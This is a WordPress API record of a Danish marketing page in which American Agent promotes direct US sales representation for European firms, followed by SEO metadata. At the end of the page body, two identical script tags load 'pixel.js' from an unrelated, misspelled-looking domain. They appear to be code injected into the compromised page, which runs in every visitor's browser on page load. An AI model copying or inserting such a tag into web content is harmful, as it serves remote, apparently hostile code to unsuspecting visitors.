{"id":3102,"date":"2014-08-30T10:05:23","date_gmt":"2014-08-30T14:05:23","guid":{"rendered":"https:\/\/americanagent.com\/direct-usa-sales-2-2\/"},"modified":"2014-09-04T12:17:16","modified_gmt":"2014-09-04T16:17:16","slug":"direkte-usa-salgs-strategi","status":"publish","type":"page","link":"https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/","title":{"rendered":"DIREKTE USA SALGS STRATEGI"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-6bf9372577b3aa791f34ddf69aac540b\">\n#top .av-special-heading.av-av_heading-6bf9372577b3aa791f34ddf69aac540b{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-6bf9372577b3aa791f34ddf69aac540b .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-6bf9372577b3aa791f34ddf69aac540b .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-6bf9372577b3aa791f34ddf69aac540b av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >DIREKTE USA SALGS STRATEGI<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-6bbb9745c24ef102d1f3feabac50c46d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>American Agent er i stand til at udf\u00f8re meget kraftig og ligetil salgsindsats p\u00e5 gr\u00e6srodsniveau her i USA.<\/p>\n<p>Mange amerikanske virksomheder eftersp\u00f8rger i dag direkte k\u00f8bs relationer til deres leverand\u00f8rer. &#8220;S\u00e6lgere p\u00e5 kommision&#8221; og traditionelle &#8220;Producent S\u00e6lgere&#8221; kommer simpelthen ikke p\u00e5 tale. P\u00e5 grund af ovenst\u00e5ende, er der mange europ\u00e6iske virksomheder, der aldrig f\u00e5r en chance hos de amerikanske k\u00f8bere og indk\u00f8bsafdelinger. Mange k\u00f8bere har f\u00e5et klare instrukser om kun at arbejde med producenter og leverand\u00f8rer, der tilbyder direkte k\u00f8bs forhold.<\/p>\n<p>Vi forst\u00e5r godt, at brug af kommissions s\u00e6lgere er m\u00e5ske den m\u00e5de, du har opereret med i \u00e5rtier, men desv\u00e6rre her i USA vil denne form for tilgang ikke give dig mulighed for at n\u00e5 de salgsresultater du h\u00e5ber p\u00e5. Hver uge bliver vi kontaktet af en virksomhed, der har indset dette &#8211; f\u00f8rst efter at have investeret masser af virksomhedens energi, tid og penge.<\/p>\n<p>Vores kontor er parat til at tage kontakt til de amerikanske virksomheder der er m\u00e5ls\u00e6tning for dine produkter- mange af dem kender vi allerede. Vi vil henvende os til hver en af dem og finde deres indk\u00f8bsafdeling og korrekte k\u00f8beren til din sektor.<\/p>\n<p>Ved straks at forklare k\u00f8beren, at vi kontakter dem for at indf\u00f8re et direkte forhold til din virksomhed, herunder direkte pris fasts\u00e6ttelse, er vi i stand til at fange deres umiddelbare interesse, og indlede salgsprocessen for dig.<\/p>\n<p>At arbejde med vores kontor giver dig mulighed for at holde fokus p\u00e5 de omr\u00e5der der er t\u00e6ttere p\u00e5 din tidszone. Du vil kun investere din tid, n\u00e5r en kvalificeret amerikansk kontakt har udtrykt solid interesse. Du kan betragte os som dit eget amerikanske salgskontor.<\/p>\n<p>For yderlig oplysning se ogs\u00e5 &#8220;Supportydelser&#8221;. At opererer direkte i USA kr\u00e6ver ofte, at du skal h\u00e5ndtere andre forretningsomr\u00e5der lige s\u00e5 godt. American Agents kontor er godt rustet til at finde de bedste l\u00f8sninger for en given situation, hvilket giver en komplet amerikansk l\u00f8sning for din virksomhed.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3102","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>DIREKTE USA SALGS STRATEGI - American Agent - USA Sales Services and Distributor Search Services<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/\" \/>\n<meta property=\"og:locale\" content=\"da_DK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"DIREKTE USA SALGS STRATEGI - American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-04T16:17:16+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/direkte-usa-salgs-strategi\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/da\\\/direkte-usa-salgs-strategi\\\/\",\"name\":\"DIREKTE USA SALGS STRATEGI - American Agent - USA Sales Services and Distributor Search Services\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/#website\"},\"datePublished\":\"2014-08-30T14:05:23+00:00\",\"dateModified\":\"2014-09-04T16:17:16+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/direkte-usa-salgs-strategi\\\/#breadcrumb\"},\"inLanguage\":\"da-DK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/da\\\/direkte-usa-salgs-strategi\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/direkte-usa-salgs-strategi\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/da\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"DIREKTE USA SALGS STRATEGI\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/da\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/da\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"da-DK\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"DIREKTE USA SALGS STRATEGI - American Agent - USA Sales Services and Distributor Search Services","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/","og_locale":"da_DK","og_type":"article","og_title":"DIREKTE USA SALGS STRATEGI - American Agent - USA Sales Services and Distributor Search Services","og_url":"https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-04T16:17:16+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/","url":"https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/","name":"DIREKTE USA SALGS STRATEGI - American Agent - USA Sales Services and Distributor Search Services","isPartOf":{"@id":"https:\/\/americanagent.com\/da\/#website"},"datePublished":"2014-08-30T14:05:23+00:00","dateModified":"2014-09-04T16:17:16+00:00","breadcrumb":{"@id":"https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/#breadcrumb"},"inLanguage":"da-DK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/da\/direkte-usa-salgs-strategi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/da\/"},{"@type":"ListItem","position":2,"name":"DIREKTE USA SALGS STRATEGI"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/da\/#website","url":"https:\/\/americanagent.com\/da\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/da\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"da-DK"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages\/3102","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/comments?post=3102"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages\/3102\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/media?parent=3102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}